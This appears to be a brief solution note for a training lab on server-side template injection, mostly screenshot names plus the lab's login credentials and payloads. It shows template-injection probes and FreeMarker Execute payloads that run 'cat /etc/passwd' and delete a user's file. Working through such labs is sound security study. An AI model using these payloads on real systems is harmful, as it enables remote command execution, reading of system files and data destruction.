Skip to content

20251119122601.png

Lab: Server-side template injection using documentation

c
content-manager : C0nt3ntM4n4g3r

20251119124024.png

20251119124052.png

20251119125700.png

c
${7*7}

20251119125725.png

c
.
.
.
${7*7}
${self.module.cache.util.os.system("id")}
.
.
.

20251119130132.png

20251119153332.png

c
${ "freemarker.template.utility.Execute" ?new()( "cat /etc/passwd" )}


<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }